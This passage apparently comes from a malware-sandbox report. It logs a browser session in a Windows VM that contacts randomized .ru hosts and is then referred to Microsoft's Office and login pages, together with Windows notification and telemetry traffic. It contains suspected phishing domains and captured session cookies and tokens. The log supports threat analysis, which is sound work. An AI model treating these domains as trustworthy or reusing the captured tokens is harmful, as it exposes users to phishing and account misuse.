                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=amCeerHIaX6WAZL5wvrBAUZpD9AsuV%2FrfMmbjlwWcW7W65KqeeFLoffGTsNAo54nyHj60pYjV81EZNzZLrOqFX5tAsf%2B1VRMNdY73b%2BYKR7BnRarQzowzhe9j1kO6h26mfIzwJRJkYDO%2B8lAuFMQ9rdqIYKEW%2FVS5Ti2G5Pt3%2BVsmMby3uu05TbaXJ88SpUWTlUV9nIG7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f589dda693061-BOS
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6634&min_rtt=6633&rtt_var=2490&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1253&delivery_rate=439494&cwnd=32&unsent_bytes=0&cid=7da85401f28290cd&ts=606&x=0"
                                                                              2025-01-20 13:17:41 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                              Data Ascii: 11
                                                                              2025-01-20 13:17:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.649928172.67.169.1974436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:42 UTC469OUTGET /dtcfafzhwhbirleqzDLxHVTpKrHALYIVUMFBINZGSUUULWLEGTEAEFQVIEXDSLXWNQQCPJZUMVLDF HTTP/1.1
                                                                              Host: pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:43 UTC901INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yyY91pQP6qgL51vCSEVAnFokSIHlZFGevbCprzDCJCUyl%2Bj4Qe5uC4EEFfDBBSyhDVRs2zM3Ir9h1KtKOqu%2BIHEZRDhv0ztgR6%2F76Dkz9h%2FyXVGdeDWn%2BvgJWPkrPU8Ml21zpBrzubhxLLOiJg7cEz8F8ECw2tCZewCjw9%2FBhvQT3eKuocdrc4PcM6xAWyuZ59IEpGTQqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f58a50c8ca1e7-YYZ
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=13834&min_rtt=13832&rtt_var=5192&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1047&delivery_rate=210784&cwnd=32&unsent_bytes=0&cid=8e9abdcfddd42323&ts=640&x=0"
                                                                              2025-01-20 13:17:43 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                              Data Ascii: 11
                                                                              2025-01-20 13:17:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.64993913.107.6.1564436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:43 UTC704OUTGET /login HTTP/1.1
                                                                              Host: www.office.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:43 UTC2242INHTTP/1.1 302 Found
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Location: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638729758636378149.ZGU2NTc3NzctN2JhOC00ZDZkLThmZjMtNDRjNzQ2ZjE5NGRmNDU0Mjk3MzktMWY4ZC00YjM4LTliYmUtMjdhYjI3M2ZhOTVi&ui_locales=en-US&mkt=en-US&client-request-id=0205399f-8b95-4f1e-b7c2-8d700bab3c2b&state=f-JCanR7Rm3Er7v7O70gXN-HgAlRK5UEBHUSMQwKv42IQiKTPJhsNMMti8lFUwaZVHmO0Q6TaF8Gi2lOf3vSrn_7IM7pm96lfhYPKiwPI3uMXaOPISJPhyB5L6JeKHWWiUF1WgwUOivSvBWt_svNojOXRhsMrGGZ-qLZynMgNWIZgTe9EvXwb9LIyfCAMZK3EU0CixugJIrfyOkAqZSzxbwzitYhfo4lIKZuJQ5VI9jnCNJoXvxV_Hn8CExKSrzoThHjjPcymHF74Zeb8gbh1A&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0
                                                                              Set-Cookie: OH.DCAffinity=OH-eus; expires=Mon, 20 Jan 2025 21:17:43 GMT; path=/; secure; samesite=none; httponly
                                                                              Set-Cookie: OH.FLID=95540132-8747-4f2d-8dfa-3a7dda887e1f; expires=Tue, 20 Jan 2026 13:17:43 GMT; path=/; secure; samesite=none; httponly
                                                                              Set-Cookie: OH.SID=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
                                                                              Set-Cookie: .AspNetCore.OpenIdConnect.Nonce.qdDYCNK4cB4kMjS5M5m0WWYi3nOaGmwNCH43QZ9xtgvOlR86DjWBOAJXgsP0n9m9SImkLBa0oWM15fioPY_EBwQbkk65AG96FeGky7wA_sw6y8TmlIuvcvAg10za9SeoZBlaxU5joL8Vxs43OwShkyb-H06WvQj1cYLWut5WTjerE9qOaVaVXgBNAoPzCpldoylhWntPKZqfIMLr3QTQeojtURDoGoP94qOHA7DAIg2OzVA2cKi1mBcEc4AW7xRK=N; expires=Mon, 20 Jan 2025 13:32:43 GMT; path=/; secure; samesite=none; httponly
                                                                              Set-Cookie: .AspNetCore.Correlation.uE33O7k6JBqFB8l77DOncsYDbNBBNXMNcsem6cyNz3s=N; expires=Mon, 20 Jan 2025 13:32:43 GMT; path=/; secure; samesite=none; httponly
                                                                              Request-Context: appId=
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-UA-Compatible: IE=edge,chrome=1
                                                                              X-Cache: CONFIG_NOCACHE
                                                                              X-MSEdge-Ref: Ref A: EFB1E79610574B1FABD99920E799917F Ref B: EWR311000108039 Ref C: 2025-01-20T13:17:43Z
                                                                              Date: Mon, 20 Jan 2025 13:17:43 GMT
                                                                              Connection: close
                                                                              Content-Length: 0


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              35192.168.2.65843340.113.110.67443
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:57 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 5a 74 4f 52 31 44 57 6a 6e 30 65 64 74 73 76 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 61 66 34 66 34 32 63 39 66 66 62 61 63 34 0d 0a 0d 0a
                                                                              Data Ascii: CNT 1 CON 305MS-CV: ZtOR1DWjn0edtsvL.1Context: 7faf4f42c9ffbac4
                                                                              2025-01-20 13:17:57 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                              2025-01-20 13:17:57 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 5a 74 4f 52 31 44 57 6a 6e 30 65 64 74 73 76 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 61 66 34 66 34 32 63 39 66 66 62 61 63 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 68 53 5a 7a 46 39 48 51 53 69 41 5a 75 45 6a 45 4c 48 38 44 48 74 69 76 42 5a 55 4f 66 6c 61 2b 2f 6a 6f 6e 43 76 61 77 43 76 4e 62 4e 76 7a 72 4b 33 56 70 2f 7a 6c 7a 41 43 58 78 44 48 4f 63 50 2f 68 4b 6a 73 30 39 32 65 54 62 37 53 79 53 30 71 51 56 53 38 43 78 52 75 66 74 5a 4e 36 78 76 30 5a 4a 31 63 43 39 44 33 72 6c
                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ZtOR1DWjn0edtsvL.2Context: 7faf4f42c9ffbac4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXhSZzF9HQSiAZuEjELH8DHtivBZUOfla+/jonCvawCvNbNvzrK3Vp/zlzACXxDHOcP/hKjs092eTb7SyS0qQVS8CxRuftZN6xv0ZJ1cC9D3rl
                                                                              2025-01-20 13:17:57 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 5a 74 4f 52 31 44 57 6a 6e 30 65 64 74 73 76 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 61 66 34 66 34 32 63 39 66 66 62 61 63 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: ZtOR1DWjn0edtsvL.3Context: 7faf4f42c9ffbac4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                              2025-01-20 13:17:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                              Data Ascii: 202 1 CON 58
                                                                              2025-01-20 13:17:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 37 35 55 34 4a 65 50 66 4b 6b 6d 31 51 34 4e 5a 4c 5a 32 58 49 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                              Data Ascii: MS-CV: 75U4JePfKkm1Q4NZLZ2XIg.0Payload parsing failed.


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.65845020.190.159.04436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:18:02 UTC1598OUTGET /common/GetCredentialType?mkt=en-US HTTP/1.1
                                                                              Host: login.microsoftonline.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-yXUcgnF8TI=AQABCQEAAABVrSpeuWamRam2jAF1XRQEGoOtfMrnyk08QeLX2PlFKyVsIRKF4WbGDPvl1Aa8jOiaAq5nzkZ8BaRzaYv3-uuNpSTpUuf0JrIh76OTbazaLzwAIH6xogKfQOqgrLs0vRmrBuq9tNXf-wNoZAjTi5RbfR7F_SJsFoqEhr7Z-kwn7CAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.ASUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAAlAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEHktZan4nERxmNuphsX30piS9djgRxdmuQbBSJ2qUggoXw06VTH_Zpg9F-0yk-sCB4B58jNPZZRXJVcxM_nGuIYcUoEtE9fCO0W7plMjqVTEgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQET_Y8dy1-R8rwLiJtG7HfzspHve935_usTVsVEtF0Ffy9lk0j_MOS0KbbdeUlLyL4hJmwLY5LTdg2kitzVhjB6RetDbgayjQu0KiJbVc6_kv5tM5OapkgIR0aGC1MjIOD-GMaIMKKc6LCr-JvHG6PH0lV3T9I-GxngeSgFhV5mEUgAA; esctx-yDQvoAkW4dg=AQABCQEAAABVrSpeuWamRam2jAF1XRQE70zu-t5Z8CFkc0uIgFp-SzpkMXNvm2cvdCOEnySrYLDGn6-7Lq-ap0EDxGJobpDeX3-qvwqOSWeqU0G-7QIK4BamdzEaOi6XkyuXpT_KTVQv8TwPDFTvnCU1vAvNRHChWvxH79sO8807QxH84yvrLiAA; fpc=AnJjeWwRx2JHkWLbimSsPWe8Ae7AAQAAAPlDIN8OAAAA; MicrosoftApplicationsTelemetryDeviceId=5b72f [TRUNCATED]
                                                                              2025-01-20 13:18:02 UTC1565INHTTP/1.1 200 OK
                                                                              Cache-Control: no-store, no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/json; charset=utf-8
                                                                              Expires: -1
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              X-Content-Type-Options: nosniff
                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                              x-ms-request-id: ed3df7d1-5228-435c-8141-28e224852a00
                                                                              x-ms-ests-server: 2.1.19870.3 - NEULR1 ProdSlices
                                                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+dub2"}]}
                                                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                              x-ms-srs: 1.P
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-ve4Lo3Ju6szT5xFLmNh2sw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
                                                                              X-XSS-Protection: 0
                                                                              Set-Cookie: fpc=AnJjeWwRx2JHkWLbimSsPWe8Ae7AAQAAAPlDIN8OAAAA; expires=Wed, 19-Feb-2025 13:18:02 GMT; path=/; secure; HttpOnly; SameSite=None
                                                                              Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                                                              Date: Mon, 20 Jan 2025 13:18:01 GMT
                                                                              Connection: close
                                                                              Content-Length: 164
                                                                              2025-01-20 13:18:02 UTC164INData Raw: 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 39 64 38 30 31 33 61 35 2d 39 36 35 62 2d 34 65 33 62 2d 39 63 64 62 2d 64 61 34 62 65 65 33 61 38 65 65 65 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 31 2d 32 30 20 31 33 3a 31 38 3a 30 32 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d
                                                                              Data Ascii: {"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"9d8013a5-965b-4e3b-9cdb-da4bee3a8eee","timestamp":"2025-01-20 13:18:02Z","message":"AADSTS900561"}}


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              37192.168.2.65845340.113.110.67443
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:18:17 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 59 2b 37 64 6f 48 2f 51 30 79 78 56 71 4d 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 33 63 30 35 66 38 35 63 61 39 30 31 37 64 38 0d 0a 0d 0a
                                                                              Data Ascii: CNT 1 CON 305MS-CV: xY+7doH/Q0yxVqMV.1Context: c3c05f85ca9017d8
                                                                              2025-01-20 13:18:17 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                              2025-01-20 13:18:17 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 59 2b 37 64 6f 48 2f 51 30 79 78 56 71 4d 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 33 63 30 35 66 38 35 63 61 39 30 31 37 64 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 68 53 5a 7a 46 39 48 51 53 69 41 5a 75 45 6a 45 4c 48 38 44 48 74 69 76 42 5a 55 4f 66 6c 61 2b 2f 6a 6f 6e 43 76 61 77 43 76 4e 62 4e 76 7a 72 4b 33 56 70 2f 7a 6c 7a 41 43 58 78 44 48 4f 63 50 2f 68 4b 6a 73 30 39 32 65 54 62 37 53 79 53 30 71 51 56 53 38 43 78 52 75 66 74 5a 4e 36 78 76 30 5a 4a 31 63 43 39 44 33 72 6c
                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: xY+7doH/Q0yxVqMV.2Context: c3c05f85ca9017d8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXhSZzF9HQSiAZuEjELH8DHtivBZUOfla+/jonCvawCvNbNvzrK3Vp/zlzACXxDHOcP/hKjs092eTb7SyS0qQVS8CxRuftZN6xv0ZJ1cC9D3rl
                                                                              2025-01-20 13:18:17 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 59 2b 37 64 6f 48 2f 51 30 79 78 56 71 4d 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 33 63 30 35 66 38 35 63 61 39 30 31 37 64 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: xY+7doH/Q0yxVqMV.3Context: c3c05f85ca9017d8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                              2025-01-20 13:18:17 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                              Data Ascii: 202 1 CON 58
                                                                              2025-01-20 13:18:17 UTC58INData Raw: 4d 53 2d 43 56 3a 20 49 33 68 33 67 51 43 4e 34 6b 79 56 44 75 51 34 57 55 2b 71 53 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                              Data Ascii: MS-CV: I3h3gQCN4kyVDuQ4WU+qSQ.0Payload parsing failed.


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.6548372.19.126.1464436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:18:30 UTC436OUTOPTIONS /api/report?catId=GW+estsfd+ams2 HTTP/1.1
                                                                              Host: identity.nel.measure.office.net
                                                                              Connection: keep-alive
                                                                              Origin: https://login.microsoftonline.com
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:18:30 UTC319INHTTP/1.1 200 OK
                                                                              Content-Type: text/html
                                                                              Content-Length: 7
                                                                              Date: Mon, 20 Jan 2025 13:18:30 GMT
                                                                              Connection: close
                                                                              Access-Control-Allow-Headers: content-type
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Methods: *
                                                                              Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                              Access-Control-Allow-Origin: *
                                                                              2025-01-20 13:18:30 UTC7INData Raw: 4f 50 54 49 4f 4e 53
                                                                              Data Ascii: OPTIONS


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.6548382.19.126.1464436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:18:31 UTC369OUTPOST /api/report?catId=GW+estsfd+ams2 HTTP/1.1
                                                                              Host: identity.nel.measure.office.net
                                                                              Connection: keep-alive
                                                                              Content-Length: 1236
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:18:31 UTC1236OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 33 37 36 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 76 32 2e 30 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 26 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 6f
                                                                              Data Ascii: [{"age":43767,"body":{"elapsed_time":1000,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.o
                                                                              2025-01-20 13:18:31 UTC333INHTTP/1.1 429 Too Many Requests
                                                                              Content-Length: 0
                                                                              Request-Context: appId=cid-v1:43ccb73c-0dfb-456b-9d4c-ddf7f5584002
                                                                              Date: Mon, 20 Jan 2025 13:18:31 GMT
                                                                              Connection: close
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Methods: *
                                                                              Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                              Access-Control-Allow-Origin: *


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Target ID:1
